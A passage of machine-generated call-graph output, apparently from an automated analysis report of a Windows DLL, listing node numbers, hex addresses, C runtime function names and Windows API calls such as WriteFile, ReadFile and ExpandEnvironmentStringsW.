__vfwprintf_l 14844->14845 14846 6f9f0f60 __vfwprintf_l 41 API calls 14845->14846 14847 6f9ebd16 14846->14847 14848 6f9ec320 __vfwprintf_l 39 API calls 14847->14848 14849 6f9ebd3a __vfwprintf_l 14847->14849 14848->14849 14850 6f9ec320 __vfwprintf_l 39 API calls 14849->14850 14851 6f9ebd6d __vfwprintf_l 14849->14851 14850->14851 14851->14798 14851->14851 14854 6f9ebf7d __vfwprintf_l 14852->14854 14853 6f9ebfb3 14853->14798 14854->14853 14877 6f9f10e1 14854->14877 14857 6f9e96cf __vfwprintf_l 14856->14857 14858 6f9e96f1 14857->14858 14860 6f9e9718 14857->14860 14859 6f9ede7c __vfwprintf_l 29 API calls 14858->14859 14862 6f9e970e __vfwprintf_l 14859->14862 14861 6f9e86ab __vfwprintf_l 15 API calls 14860->14861 14860->14862 14861->14862 14862->14798 14864 6f9e93b0 __vfwprintf_l 14863->14864 14865 6f9e93d2 14864->14865 14867 6f9e93f9 14864->14867 14866 6f9ede7c __vfwprintf_l 29 API calls 14865->14866 14869 6f9e93ef __vfwprintf_l 14866->14869 14868 6f9e86ab __vfwprintf_l 15 API calls 14867->14868 14867->14869 14868->14869 14869->14798 14871 6f9ec130 14870->14871 14890 6f9e907c 14871->14890 14873 6f9ec140 14873->14798 14875 6f9e96ba __vfwprintf_l 30 API calls 14874->14875 14876 6f9ec173 14875->14876 14876->14798 14879 6f9f10f6 14877->14879 14878 6f9f1137 14882 6f9f1123 __fread_nolock 14878->14882 14886 6f9f10fa __fread_nolock __vfwprintf_l 14878->14886 14887 6f9f4945 14878->14887 14879->14878 14881 6f9ec320 __vfwprintf_l 39 API calls 14879->14881 14879->14882 14879->14886 14880 6f9ede7c __vfwprintf_l 29 API calls 14880->14886 14881->14878 14882->14880 14882->14886 14884 6f9f11f2 14885 6f9f1208 GetLastError 14884->14885 14884->14886 14885->14882 14885->14886 14886->14853 14888 6f9f4958 __vfwprintf_l 14887->14888 14889 6f9f4996 WideCharToMultiByte 14888->14889 14889->14884 14891 6f9e9091 __vfwprintf_l 14890->14891 14892 6f9e90b3 14891->14892 14894 6f9e90da 14891->14894 14893 6f9ede7c __vfwprintf_l 29 API calls 14892->14893 14895 6f9e90d0 __vfwprintf_l 14893->14895 14894->14895 14896 6f9e86ab __vfwprintf_l 15 API calls 14894->14896 14895->14873 14896->14895 14908 6f9e3c50 14897->14908 14901 6f9e38df __DllMainCRTStartup@12 14907 6f9e3905 __DllMainCRTStartup@12 14901->14907 14915 6f9e3c2b 14901->14915 14905 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14906 6f9e33db 14905->14906 14906->13792 14907->14905 14909 6f9e3c6b __DllMainCRTStartup@12 14908->14909 14910 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14909->14910 14911 6f9e38d5 14910->14911 14911->14901 14912 6f9e142c 14911->14912 14923 6f9e48b3 14912->14923 14916 6f9e3c50 __DllMainCRTStartup@12 5 API calls 14915->14916 14917 6f9e3c3a 14916->14917 14952 6f9e3d08 14917->14952 14920 6f9e3f56 14956 6f9e40a1 14920->14956 14928 6f9e4801 14923->14928 14927 6f9e48d2 14934 6f9e47b1 14928->14934 14931 6f9e6486 14932 6f9e64cd RaiseException 14931->14932 14933 6f9e64a0 14931->14933 14932->14927 14933->14932 14937 6f9e5b7e 14934->14937 14938 6f9e5b8b ___std_exception_copy 14937->14938 14942 6f9e47dd 14937->14942 14939 6f9e5bb8 14938->14939 14938->14942 14943 6f9eed88 14938->14943 14941 6f9ed5ab ___std_exception_destroy 14 API calls 14939->14941 14941->14942 14942->14931 14944 6f9eed96 14943->14944 14945 6f9eeda4 14943->14945 14944->14945 14950 6f9eedbc 14944->14950 14946 6f9f0431 __dosmaperr 14 API calls 14945->14946 14947 6f9eedac 14946->14947 14948 6f9edef9 __wsopen_s 39 API calls 14947->14948 14949 6f9eedb6 14948->14949 14949->14939 14950->14949 14951 6f9f0431 __dosmaperr 14 API calls 14950->14951 14951->14947 14955 6f9e3d29 __DllMainCRTStartup@12 14952->14955 14953 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14954 6f9e3966 14953->14954 14954->14920 14955->14953 14959 6f9e40b3 14956->14959 14964 6f9e40fa 14959->14964 14965 6f9e40c2 14964->14965 14966 6f9e4113 14964->14966 14968 6f9e40ce 14965->14968 14974 6f9e1339 14966->14974 14969 6f9e40da 14968->14969 14970 6f9e40e5 14968->14970 14978 6f9e411f 14969->14978 14972 6f9e3f70 14970->14972 14986 6f9e139b 14970->14986 14972->14907 14975 6f9e1347 __DllMainCRTStartup@12 14974->14975 14976 6f9e6486 std::_Xinvalid_argument RaiseException 14975->14976 14977 6f9e1355 14976->14977 14977->14965 14979 6f9e413b 14978->14979 14980 6f9e4136 14978->14980 14982 6f9e139b __DllMainCRTStartup@12 3 API calls 14979->14982 14981 6f9e1339 __DllMainCRTStartup@12 RaiseException 14980->14981 14981->14979 14984 6f9e4143 14982->14984 14985 6f9e415c 14984->14985 14989 6f9edf09 14984->14989 14985->14972 15000 6f9e4ae8 14986->15000 14994 6f9ede45 14989->14994 14992 6f9edf26 __vfwprintf_l 11 API calls 14993 6f9edf25 14992->14993 14995 6f9ede57 __vfwprintf_l 14994->14995 14996 6f9ede7c __vfwprintf_l 29 API calls 14995->14996 14997 6f9ede6f 14996->14997 14998 6f9e7d4e __vfwprintf_l 39 API calls 14997->14998 14999 6f9ede7a 14998->14999 14999->14992 15001 6f9e4aed ___std_exception_copy 15000->15001 15002 6f9e13a6 15001->15002 15003 6f9edf8f __dosmaperr 2 API calls 15001->15003 15005 6f9e4b09 __DllMainCRTStartup@12 15001->15005 15002->14972 15003->15001 15004 6f9e501f __DllMainCRTStartup@12 15006 6f9e6486 std::_Xinvalid_argument RaiseException 15004->15006 15005->15004 15008 6f9e6486 std::_Xinvalid_argument RaiseException 15005->15008 15007 6f9e503c 15006->15007 15008->15004 15010 6f9e3ccb __DllMainCRTStartup@12 15009->15010 15013 6f9e3d6a 15010->15013 15012 6f9e3ce2 15012->13849 15018 6f9e3f02 15013->15018 15017 6f9e3db1 __DllMainCRTStartup@12 15017->15012 15019 6f9e3d7e 15018->15019 15020 6f9e3f14 15018->15020 15019->15017 15022 6f9e3f85 15019->15022 15035 6f9e3f1d 15020->15035 15023 6f9e3c50 __DllMainCRTStartup@12 5 API calls 15022->15023 15025 6f9e3faf 15023->15025 15024 6f9e3fbc 15027 6f9e3c2b __DllMainCRTStartup@12 5 API calls 15024->15027 15025->15024 15026 6f9e142c __DllMainCRTStartup@12 40 API calls 15025->15026 15026->15024 15028 6f9e3fd9 __DllMainCRTStartup@12 15027->15028 15029 6f9e3f56 __DllMainCRTStartup@12 40 API calls 15028->15029 15030 6f9e3ff3 __DllMainCRTStartup@12 15029->15030 15032 6f9e405b __DllMainCRTStartup@12 15030->15032 15046 6f9e377a 15030->15046 15033 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15032->15033 15034 6f9e409d 15033->15034 15034->15017 15038 6f9e48d3 15035->15038 15043 6f9e4856 15038->15043 15041 6f9e6486 std::_Xinvalid_argument RaiseException 15042 6f9e48f2 15041->15042 15044 6f9e47b1 std::exception::exception 39 API calls 15043->15044 15045 6f9e4868 15044->15045 15045->15041 15049 6f9e3839 15046->15049 15052 6f9e3bd2 15049->15052 15051 6f9e37ac 15051->15032 15053 6f9e3bfd 15052->15053 15055 6f9e3c0a __DllMainCRTStartup@12 15052->15055 15056 6f9e13a9 15053->15056 15055->15051 15057 6f9e13e5 15056->15057 15058 6f9edf09 __DllMainCRTStartup@12 39 API calls 15057->15058 15059 6f9e1400 15057->15059 15058->15057 15059->15055 15061 6f9e34e1 __DllMainCRTStartup@12 15060->15061 15062 6f9e377a __DllMainCRTStartup@12 39 API calls 15061->15062 15063 6f9e3525 __DllMainCRTStartup@12 15061->15063 15062->15063 15063->13851 15065 6f9e32aa __DllMainCRTStartup@12 15064->15065 15068 6f9e359b 15065->15068 15067 6f9e32be 15067->13792 15069 6f9e35f4 15068->15069 15071 6f9e35af __DllMainCRTStartup@12 15068->15071 15072 6f9e3ae0 15069->15072 15071->15067 15073 6f9e3c50 __DllMainCRTStartup@12 5 API calls 15072->15073 15074 6f9e3afb 15073->15074 15075 6f9e3b05 15074->15075 15076 6f9e142c __DllMainCRTStartup@12 40 API calls 15074->15076 15077 6f9e3c2b __DllMainCRTStartup@12 5 API calls 15075->15077 15076->15075 15078 6f9e3b19 __DllMainCRTStartup@12 15077->15078 15079 6f9e3f56 __DllMainCRTStartup@12 40 API calls 15078->15079 15080 6f9e3b33 __DllMainCRTStartup@12 15079->15080 15081 6f9e377a __DllMainCRTStartup@12 39 API calls 15080->15081 15082 6f9e3b80 __DllMainCRTStartup@12 15080->15082 15081->15082 15083 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15082->15083 15084 6f9e3ba8 15083->15084 15084->15071 15086 6f9e10df __vfwprintf_l 15085->15086 15123 6f9e10a2 15086->15123 15090 6f9e3421 __DllMainCRTStartup@12 15089->15090 15333 6f9e39e9 15090->15333 15093 6f9e23ce 15094 6f9e23f4 __DllMainCRTStartup@12 15093->15094 15095 6f9e240b ExpandEnvironmentStringsW 15094->15095 15096 6f9e329b __DllMainCRTStartup@12 40 API calls 15095->15096 15097 6f9e2421 15096->15097 15098 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15097->15098 15099 6f9e242e 15098->15099 15100 6f9e1654 VariantInit 15099->15100 15100->13874 15101->13878 15102->13880 15103->13884 15104->13886 15105->13888 15106->13890 15107->13892 15109 6f9e139b __DllMainCRTStartup@12 3 API calls 15108->15109 15110 6f9e1485 __DllMainCRTStartup@12 15109->15110 15112 6f9e14a8 __DllMainCRTStartup@12 15110->15112 15344 6f9e1543 SysAllocString 15110->15344 15112->13900 15346 6f9e1522 15113->15346 15124 6f9e10b6 __vfwprintf_l 15123->15124 15127 6f9ec687 15124->15127 15128 6f9ec69b __vfwprintf_l 15127->15128 15129 6f9ec6bd 15128->15129 15131 6f9ec6e4 15128->15131 15130 6f9ede7c __vfwprintf_l 29 API calls 15129->15130 15132 6f9ec6d8 15130->15132 15136 6f9e81ef 15131->15136 15134 6f9e7d4e __vfwprintf_l 39 API calls 15132->15134 15135 6f9e10c0 76C9D120 15134->15135 15135->13869 15137 6f9e81fb ___scrt_is_nonwritable_in_current_image 15136->15137 15144 6f9ecc7d RtlEnterCriticalSection 15137->15144 15139 6f9e8209 15145 6f9ea16d 15139->15145 15144->15139 15159 6f9f13fe 15145->15159 15147 6f9ea194 __vfwprintf_l 15166 6f9ea46b 15147->15166 15150 6f9ea12f __vfwprintf_l 14 API calls 15151 6f9ea1e8 15150->15151 15181 6f9f14a9 15151->15181 15154 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15155 6f9e8216 15154->15155 15156 6f9e823e 15155->15156 15332 6f9ecc91 RtlLeaveCriticalSection 15156->15332 15158 6f9e8227 15158->15132 15185 6f9f13c0 15159->15185 15161 6f9f140f __vfwprintf_l 15162 6f9f1471 15161->15162 15163 6f9f047e __fread_nolock 15 API calls 15161->15163 15162->15147 15164 6f9f1468 15163->15164 15165 6f9f0444 ___free_lconv_mon 14 API calls 15164->15165 15165->15162 15208 6f9ec396 15166->15208 15169 6f9ea4b9 __vfwprintf_l 15171 6f9ea1db 15169->15171 15175 6f9ec320 __vfwprintf_l 39 API calls 15169->15175 15176 6f9ea379 __vfwprintf_l 39 API calls 15169->15176 15177 6f9ea6ad 15169->15177 15214 6f9eac3f 15169->15214 15248 6f9eb07b 15169->15248 15170 6f9ea491 15172 6f9ede7c __vfwprintf_l 29 API calls 15170->15172 15171->15150 15172->15171 15175->15169 15176->15169 15178 6f9ede7c __vfwprintf_l 29 API calls 15177->15178 15179 6f9ea6c7 15178->15179 15180 6f9ede7c __vfwprintf_l 29 API calls 15179->15180 15180->15171 15182 6f9f14b4 15181->15182 15183 6f9ea1f5 15181->15183 15182->15183 15285 6f9f1d58 15182->15285 15183->15154 15186 6f9f13cc __vfwprintf_l 15185->15186 15187 6f9f13f6 15186->15187 15192 6f9eeea2 15186->15192 15187->15161 15189 6f9f13e7 15199 6f9f5a73 15189->15199 15191 6f9f13ed 15191->15161 15193 6f9eeeae 15192->15193 15194 6f9eeec3 15192->15194 15195 6f9f0431 __dosmaperr 14 API calls 15193->15195 15194->15189 15196 6f9eeeb3 15195->15196 15197 6f9edef9 __wsopen_s 39 API calls 15196->15197 15198 6f9eeebe 15197->15198 15198->15189 15200 6f9f5a8d 15199->15200 15201 6f9f5a80 15199->15201 15204 6f9f5a99 15200->15204 15205 6f9f0431 __dosmaperr 14 API calls 15200->15205 15202 6f9f0431 __dosmaperr 14 API calls 15201->15202 15203 6f9f5a85 15202->15203 15203->15191 15204->15191 15206 6f9f5aba 15205->15206 15207 6f9edef9 __wsopen_s 39 API calls 15206->15207 15207->15203 15209 6f9ec3c3 15208->15209 15210 6f9ec3a1 15208->15210 15277 6f9ec3ff 15209->15277 15211 6f9ede7c __vfwprintf_l 29 API calls 15210->15211 15213 6f9ea486 15211->15213 15213->15169 15213->15170 15213->15171 15215 6f9eac5d 15214->15215 15216 6f9eac46 15214->15216 15219 6f9ede7c __vfwprintf_l 29 API calls 15215->15219 15225 6f9eac9c 15215->15225 15217 6f9eb09f 15216->15217 15218 6f9eb10b 15216->15218 15216->15225 15220 6f9eb0a5 15217->15220 15221 6f9eb133 15217->15221 15223 6f9eb14a 15218->15223 15224 6f9eb110 15218->15224 15222 6f9eac91 15219->15222 15235 6f9eb0aa 15220->15235 15236 6f9eb100 15220->15236 15230 6f9e939b __vfwprintf_l 30 API calls 15221->15230 15222->15169 15226 6f9eb14f 15223->15226 15227 6f9eb169 15223->15227 15228 6f9eb112 15224->15228 15229 6f9eb141 15224->15229 15225->15169 15226->15221 15226->15236 15246 6f9eb0d2 __vfwprintf_l 15226->15246 15232 6f9ec15e __vfwprintf_l 30 API calls 15227->15232 15233 6f9eb0b9 15228->15233 15239 6f9eb121 15228->15239 15231 6f9ec124 __vfwprintf_l 30 API calls 15229->15231 15230->15246 15231->15246 15232->15246 15234 6f9ebc2a __vfwprintf_l 42 API calls 15233->15234 15247 6f9eb174 __vfwprintf_l 15233->15247 15234->15246 15235->15233 15237 6f9eb0e5 15235->15237 15235->15246 15238 6f9e96ba __vfwprintf_l 30 API calls 15236->15238 15236->15247 15240 6f9ebf62 __vfwprintf_l 41 API calls 15237->15240 15237->15247 15238->15246 15239->15221 15241 6f9eb125 15239->15241 15240->15246 15243 6f9ec09f __vfwprintf_l 29 API calls 15241->15243 15241->15247 15242 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15244 6f9eb3bb 15242->15244 15243->15246 15244->15169 15245 6f9f10e1 __vfwprintf_l 41 API calls 15245->15246 15246->15245 15246->15247 15247->15242 15249 6f9eb09f 15248->15249 15250 6f9eb10b 15248->15250 15251 6f9eb0a5 15249->15251 15252 6f9eb133 15249->15252 15253 6f9eb14a 15250->15253 15254 6f9eb110 15250->15254 15264 6f9eb0aa 15251->15264 15265 6f9eb100 15251->15265 15260 6f9e939b __vfwprintf_l 30 API calls 15252->15260 15255 6f9eb14f 15253->15255 15256 6f9eb169 15253->15256 15257 6f9eb112 15254->15257 15258 6f9eb141 15254->15258 15255->15252 15255->15265 15275 6f9eb0d2 __vfwprintf_l 15255->15275 15259 6f9ec15e __vfwprintf_l 30 API calls 15256->15259 15262 6f9eb0b9 15257->15262 15269 6f9eb121 15257->15269 15261 6f9ec124 __vfwprintf_l 30 API calls 15258->15261 15259->15275 15260->15275 15261->15275 15263 6f9ebc2a __vfwprintf_l 42 API calls 15262->15263 15267 6f9eb174 __vfwprintf_l 15262->15267 15263->15275 15264->15262 15266 6f9eb0e5 15264->15266 15264->15275 15265->15267 15268 6f9e96ba __vfwprintf_l 30 API calls 15265->15268 15266->15267 15270 6f9ebf62 __vfwprintf_l 41 API calls 15266->15270 15272 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15267->15272 15268->15275 15269->15252 15271 6f9eb125 15269->15271 15270->15275 15271->15267 15273 6f9ec09f __vfwprintf_l 29 API calls 15271->15273 15274 6f9eb3bb 15272->15274 15273->15275 15274->15169 15275->15267 15276 6f9f10e1 __vfwprintf_l 41 API calls 15275->15276 15276->15275 15278 6f9ec413 15277->15278 15280 6f9ec47d 15277->15280 15279 6f9eeea2 __fread_nolock 39 API calls 15278->15279 15281 6f9ec41a 15279->15281 15280->15213 15281->15280 15282 6f9f0431 __dosmaperr 14 API calls 15281->15282 15283 6f9ec472 15282->15283 15284 6f9edef9 __wsopen_s 39 API calls 15283->15284 15284->15280 15286 6f9f1d71 15285->15286 15290 6f9f1d98 15285->15290 15287 6f9eeea2 __fread_nolock 39 API calls 15286->15287 15286->15290 15288 6f9f1d8d 15287->15288 15291 6f9f2dbf 15288->15291 15290->15183 15292 6f9f2dcb ___scrt_is_nonwritable_in_current_image 15291->15292 15293 6f9f2e0c 15292->15293 15294 6f9f2e52 15292->15294 15301 6f9f2dd3 15292->15301 15295 6f9ede7c __vfwprintf_l 29 API calls 15293->15295 15302 6f9f5062 RtlEnterCriticalSection 15294->15302 15295->15301 15297 6f9f2e58 15298 6f9f2e76 15297->15298 15303 6f9f2ed0 15297->15303 15329 6f9f2ec8 15298->15329 15301->15290 15302->15297 15304 6f9f2ef8 15303->15304 15328 6f9f2f1b __wsopen_s 15303->15328 15305 6f9f2efc 15304->15305 15307 6f9f2f57 15304->15307 15306 6f9ede7c __vfwprintf_l 29 API calls 15305->15306 15306->15328 15308 6f9f2f75 15307->15308 15310 6f9ef10f __wsopen_s 41 API calls 15307->15310 15309 6f9f2a15 __wsopen_s 40 API calls 15308->15309 15311 6f9f2f87 15309->15311 15310->15308 15312 6f9f2f8d 15311->15312 15313 6f9f2fd4 15311->15313 15314 6f9f2fbc 15312->15314 15315 6f9f2f95 15312->15315 15316 6f9f303d WriteFile 15313->15316 15317 6f9f2fe8 15313->15317 15320 6f9f25e6 __wsopen_s 45 API calls 15314->15320 15324 6f9f29ad __wsopen_s 6 API calls 15315->15324 15315->15328 15321 6f9f305f GetLastError 15316->15321 15316->15328 15318 6f9f3029 15317->15318 15319 6f9f2ff0 15317->15319 15325 6f9f2a92 __wsopen_s 7 API calls 15318->15325 15322 6f9f3015 15319->15322 15323 6f9f2ff5 15319->15323 15320->15328 15321->15328 15326 6f9f2c56 __wsopen_s 8 API calls 15322->15326 15327 6f9f2b6d __wsopen_s 7 API calls 15323->15327 15323->15328 15324->15328 15325->15328 15326->15328 15327->15328 15328->15298 15330 6f9f5117 __wsopen_s RtlLeaveCriticalSection 15329->15330 15331 6f9f2ece 15330->15331 15331->15301 15332->15158 15334 6f9e3c50 __DllMainCRTStartup@12 5 API calls 15333->15334 15335 6f9e3a0a 15334->15335 15336 6f9e142c __DllMainCRTStartup@12 40 API calls 15335->15336 15337 6f9e3a14 __DllMainCRTStartup@12 15335->15337 15336->15337 15338 6f9e3c2b __DllMainCRTStartup@12 5 API calls 15337->15338 15340 6f9e3a3a __DllMainCRTStartup@12 15337->15340 15339 6f9e3a7c 15338->15339 15341 6f9e3f56 __DllMainCRTStartup@12 40 API calls 15339->15341 15342 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15340->15342 15341->15340 15343 6f9e2500 15342->15343 15343->15093 15345 6f9e1571 __DllMainCRTStartup@12 15344->15345 15345->15112 15347 6f9e14f6 15346->15347 15348 6f9e1531 15346->15348 15347->13906 15347->13907 15350 6f9e1588 15348->15350 15351 6f9e15a4 15350->15351 15352 6f9e15ba 15350->15352 15351->15352 15354 6f9e15c8 15351->15354 15352->15347 15357 6f9e15fe 15354->15357 15356 6f9e15d7 __DllMainCRTStartup@12 15356->15352 15360 6f9e160f 15357->15360 15359 6f9e160d 15359->15356 15361 6f9e161f SysFreeString 15360->15361 15362 6f9e1630 __DllMainCRTStartup@12 15360->15362 15361->15362 15362->15359 15364 6f9ecd68 15363->15364 15365 6f9ecd79 15363->15365 15366 6f9f0431 __dosmaperr 14 API calls 15364->15366 15406 6f9ecca5 15365->15406 15368 6f9ecd6d 15366->15368 15370 6f9edef9 __wsopen_s 39 API calls 15368->15370 15371 6f9e2032 15370->15371 15371->14140 15373 6f9ed1e0 15371->15373 15372 6f9f0431 __dosmaperr 14 API calls 15372->15371 15374 6f9ed1f3 __vfwprintf_l 15373->15374 15462 6f9ecf71 15374->15462 15377 6f9e7d4e __vfwprintf_l 39 API calls 15378 6f9e204b 15377->15378 15379 6f9e81bf 15378->15379 15380 6f9e81d2 __vfwprintf_l 15379->15380 15522 6f9e7ab3 15380->15522 15383 6f9e7d4e __vfwprintf_l 39 API calls 15384 6f9e2056 15383->15384 15385 6f9ecec7 15384->15385 15386 6f9eceda __vfwprintf_l 15385->15386 15592 6f9ecda2 15386->15592 15388 6f9ecee6 15389 6f9e7d4e __vfwprintf_l 39 API calls 15388->15389 15390 6f9e2062 15389->15390 15390->14149 15668 6f9edbb6 15391->15668 15395 6f9ecb21 __vfwprintf_l __DllMainCRTStartup@12 15394->15395 15806 6f9ec7ee 15395->15806 15397 6f9ecb42 15398 6f9e7d4e __vfwprintf_l 39 API calls 15397->15398 15399 6f9e211b 15398->15399 15399->14155 15401 6f9ed4f2 __vfwprintf_l 15400->15401 15903 6f9ed2c1 15401->15903 15403 6f9ed507 15404 6f9e7d4e __vfwprintf_l 39 API calls 15403->15404 15407 6f9eccb1 ___scrt_is_nonwritable_in_current_image 15406->15407 15408 6f9eccb8 15407->15408 15410 6f9eccda 15407->15410 15409 6f9f0431 __dosmaperr 14 API calls 15408->15409 15411 6f9eccbd 15409->15411 15412 6f9eccdf 15410->15412 15413 6f9eccec 15410->15413 15414 6f9edef9 __wsopen_s 39 API calls 15411->15414 15416 6f9f0431 __dosmaperr 14 API calls 15412->15416 15423 6f9f1e6f 15413->15423 15415 6f9eccc8 15414->15415 15415->15371 15415->15372 15416->15415 15419 6f9eccfb 15421 6f9f0431 __dosmaperr 14 API calls 15419->15421 15420 6f9ecd08 __DllMainCRTStartup@12 15431 6f9ecd44 15420->15431 15421->15415 15424 6f9f1e7b ___scrt_is_nonwritable_in_current_image 15423->15424 15435 6f9f351f RtlEnterCriticalSection 15424->15435 15426 6f9f1e89 15436 6f9f1f13 15426->15436 15434 6f9ecd48 __DllMainCRTStartup@12 15431->15434 15433 6f9ecd59 15433->15415 15461 6f9ecc91 RtlLeaveCriticalSection 15434->15461 15435->15426 15443 6f9f1f36 15436->15443 15437 6f9f1f8e 15438 6f9f1658 __dosmaperr 14 API calls 15437->15438 15439 6f9f1f97 15438->15439 15441 6f9f0444 ___free_lconv_mon 14 API calls 15439->15441 15442 6f9f1fa0 15441->15442 15448 6f9f1e96 15442->15448 15454 6f9f19b1 15442->15454 15443->15437 15443->15443 15443->15448 15452 6f9ecc7d RtlEnterCriticalSection 15443->15452 15453 6f9ecc91 RtlLeaveCriticalSection 15443->15453 15449 6f9f1ecf 15448->15449 15460 6f9f3567 RtlLeaveCriticalSection 15449->15460 15451 6f9eccf5 15451->15419 15451->15420 15452->15443 15453->15443 15455 6f9f17ce __dosmaperr 5 API calls 15454->15455 15456 6f9f19cd 15455->15456 15457 6f9f19eb InitializeCriticalSectionAndSpinCount 15456->15457 15458 6f9f19d6 15456->15458 15457->15458 15459 6f9ecc7d RtlEnterCriticalSection 15458->15459 15459->15448 15460->15451 15461->15433 15464 6f9ecf7d ___scrt_is_nonwritable_in_current_image 15462->15464 15463 6f9ecf83 15465 6f9ede7c __vfwprintf_l 29 API calls 15463->15465 15464->15463 15466 6f9ecfc6 15464->15466 15468 6f9ecf9e 15465->15468 15473 6f9ecc7d RtlEnterCriticalSection 15466->15473 15468->15377 15469 6f9ecfd2 15474 6f9ed0f4 15469->15474 15471 6f9ecfe8 15483 6f9ed011 15471->15483 15473->15469 15475 6f9ed11a 15474->15475 15476 6f9ed107 15474->15476 15486 6f9ed01b 15475->15486 15476->15471 15478 6f9ed13d __DllMainCRTStartup@12 15479 6f9f1d58 __vfwprintf_l 64 API calls 15478->15479 15482 6f9ed1cb 15478->15482 15480 6f9ed16b 15479->15480 15490 6f9ef10f 15480->15490 15482->15471 15521 6f9ecc91 RtlLeaveCriticalSection 15483->15521 15485 6f9ed019 15485->15468 15487 6f9ed02c 15486->15487 15489 6f9ed084 __DllMainCRTStartup@12 15486->15489 15487->15489 15493 6f9ef0cf 15487->15493 15489->15478 15491 6f9eefee __fread_nolock 41 API calls 15490->15491 15492 6f9ef128 15491->15492 15492->15482 15494 6f9ef0e3 __vfwprintf_l 15493->15494 15499 6f9eefee 15494->15499 15496 6f9ef0f8 15497 6f9e7d4e __vfwprintf_l 39 API calls 15496->15497 15498 6f9ef107 15497->15498 15498->15489 15505 6f9f52de 15499->15505 15501 6f9ef000 15502 6f9ef01c SetFilePointerEx 15501->15502 15504 6f9ef008 __wsopen_s 15501->15504 15503 6f9ef034 GetLastError 15502->15503 15502->15504 15503->15504 15504->15496 15506 6f9f52eb 15505->15506 15507 6f9f5300 15505->15507 15518 6f9f041e 15506->15518 15509 6f9f041e __dosmaperr 14 API calls 15507->15509 15511 6f9f5325 15507->15511 15512 6f9f5330 15509->15512 15511->15501 15514 6f9f0431 __dosmaperr 14 API calls 15512->15514 15513 6f9f0431 __dosmaperr 14 API calls 15515 6f9f52f8 15513->15515 15516 6f9f5338 15514->15516 15515->15501 15517 6f9edef9 __wsopen_s 39 API calls 15516->15517 15517->15515 15519 6f9ef5e8 __dosmaperr 14 API calls 15518->15519 15520 6f9f0423 15519->15520 15520->15513 15521->15485 15523 6f9e7abf ___scrt_is_nonwritable_in_current_image 15522->15523 15524 6f9e7ac6 15523->15524 15525 6f9e7ae7 15523->15525 15526 6f9ede7c __vfwprintf_l 29 API calls 15524->15526 15533 6f9ecc7d RtlEnterCriticalSection 15525->15533 15529 6f9e7adf 15526->15529 15528 6f9e7af2 15534 6f9e7b33 15528->15534 15529->15383 15533->15528 15540 6f9e7b65 15534->15540 15536 6f9e7b01 15537 6f9e7b29 15536->15537 15591 6f9ecc91 RtlLeaveCriticalSection 15537->15591 15539 6f9e7b31 15539->15529 15541 6f9e7b9c 15540->15541 15542 6f9e7b74 15540->15542 15544 6f9eeea2 __fread_nolock 39 API calls 15541->15544 15543 6f9ede7c __vfwprintf_l 29 API calls 15542->15543 15552 6f9e7b8f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15543->15552 15545 6f9e7ba5 15544->15545 15553 6f9ef0b1 15545->15553 15548 6f9e7c4f 15556 6f9e7f55 15548->15556 15550 6f9e7c66 __DllMainCRTStartup@12 15550->15552 15568 6f9e7d8a 15550->15568 15552->15536 15575 6f9eeec9 15553->15575 15557 6f9e7f64 __wsopen_s 15556->15557 15558 6f9eeea2 __fread_nolock 39 API calls 15557->15558 15560 6f9e7f80 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15558->15560 15559 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15561 6f9e80fe 15559->15561 15562 6f9ef0b1 __DllMainCRTStartup@12 43 API calls 15560->15562 15567 6f9e7f8c 15560->15567 15561->15552 15563 6f9e7fe0 15562->15563 15564 6f9e8012 ReadFile 15563->15564 15563->15567 15565 6f9e8039 15564->15565 15564->15567 15566 6f9ef0b1 __DllMainCRTStartup@12 43 API calls 15565->15566 15566->15567 15567->15559 15569 6f9eeea2 __fread_nolock 39 API calls 15568->15569 15570 6f9e7d9d 15569->15570 15571 6f9e7de7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 15570->15571 15572 6f9ef0b1 __DllMainCRTStartup@12 43 API calls 15570->15572 15571->15552 15573 6f9e7e44 15572->15573 15573->15571 15574 6f9ef0b1 __DllMainCRTStartup@12 43 API calls 15573->15574 15574->15571 15576 6f9eeed5 ___scrt_is_nonwritable_in_current_image 15575->15576 15577 6f9eef18 15576->15577 15578 6f9eef5e 15576->15578 15585 6f9e7bc3 15576->15585 15579 6f9ede7c __vfwprintf_l 29 API calls 15577->15579 15586 6f9f5062 RtlEnterCriticalSection 15578->15586 15579->15585 15581 6f9eef64 15582 6f9eef85 15581->15582 15583 6f9eefee __fread_nolock 41 API calls 15581->15583 15587 6f9eefe6 15582->15587 15583->15582 15585->15548 15585->15550 15585->15552 15586->15581 15590 6f9f5117 RtlLeaveCriticalSection 15587->15590 15589 6f9eefec 15589->15585 15590->15589 15591->15539 15593 6f9ecdae ___scrt_is_nonwritable_in_current_image 15592->15593 15594 6f9ecddb 15593->15594 15595 6f9ecdb8 15593->15595 15598 6f9ecdd3 __DllMainCRTStartup@12 15594->15598 15603 6f9ecc7d RtlEnterCriticalSection 15594->15603 15596 6f9ede7c __vfwprintf_l 29 API calls 15595->15596 15596->15598 15598->15388 15599 6f9ecdf9 15604 6f9ece39 15599->15604 15601 6f9ece06 15618 6f9ece31 15601->15618 15603->15599 15605 6f9ece46 15604->15605 15607 6f9ece69 15604->15607 15606 6f9ede7c __vfwprintf_l 29 API calls 15605->15606 15609 6f9ece61 __DllMainCRTStartup@12 15606->15609 15608 6f9f1d58 __vfwprintf_l 64 API calls 15607->15608 15607->15609 15610 6f9ece81 15608->15610 